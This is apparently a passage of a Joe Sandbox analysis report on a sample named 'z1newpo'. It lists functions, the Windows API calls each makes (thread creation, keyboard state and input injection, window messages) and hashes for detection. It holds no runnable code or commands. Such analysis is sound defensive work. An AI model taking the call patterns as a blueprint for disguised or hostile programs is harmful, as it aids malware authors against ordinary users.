                                                    • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                    • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                    • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                    Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                    • GetFocus.USER32 ref: 00448ACF
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$Enable$Show$FocusMessageSend
                                                    • String ID:
                                                    • API String ID: 3429747543-0
                                                    • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                    • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                    • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                    • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                    Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                      • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                      • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                    • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                    • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                    • String ID:
                                                    • API String ID: 3300667738-0
                                                    • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                    • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                    • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                    • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                    Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                    • __swprintf.LIBCMT ref: 0045D4E9
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu$\VH
                                                    • API String ID: 3164766367-2432546070
                                                    • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                    • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                    • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                    • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                    Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                    • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                    • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 3850602802-3636473452
                                                    • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                    • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                    • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                    • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                    Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                    • String ID:
                                                    • API String ID: 3985565216-0
                                                    • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                    • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                    • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                    • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                    Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _malloc.LIBCMT ref: 0041F707
                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                    • _free.LIBCMT ref: 0041F71A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free_malloc
                                                    • String ID: [B
                                                    • API String ID: 1020059152-632041663
                                                    • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                    • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                    • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                    • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                    Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                    • __calloc_crt.LIBCMT ref: 00413DB0
                                                    • __getptd.LIBCMT ref: 00413DBD
                                                    • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                    • _free.LIBCMT ref: 00413E07
                                                    • __dosmaperr.LIBCMT ref: 00413E12
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                    • String ID:
                                                    • API String ID: 155776804-0
                                                    • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                    • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                    • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                    • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                    Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                      • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                    • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                    • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                    • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                    Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                    • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                    • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                    • ExitThread.KERNEL32 ref: 00413D4E
                                                    • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                    • __freefls@4.LIBCMT ref: 00413D74
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                    • String ID:
                                                    • API String ID: 259663610-0
                                                    • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                    • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                    • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                    • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                    Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 004302E6
                                                    • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                    • GetClientRect.USER32(?,?), ref: 00430364
                                                    • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                    • GetWindowRect.USER32(?,?), ref: 004303C3
                                                    • ScreenToClient.USER32(?,?), ref: 004303EC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                    • String ID:
                                                    • API String ID: 3220332590-0
                                                    • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                    • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                    • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                    • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                    Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _malloc_wcslen$_strcat_wcscpy
                                                    • String ID:
                                                    • API String ID: 1612042205-0
                                                    • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                    • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                    • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                    • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                    Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove_strncmp
                                                    • String ID: >$U$\
                                                    • API String ID: 2666721431-237099441
                                                    • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                    • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                    • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                    • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                    Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0044C570
                                                    • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                    • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                    • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                    • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$InputSend
                                                    • String ID:
                                                    • API String ID: 2221674350-0
                                                    • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                    • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                    • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                    • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                    Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
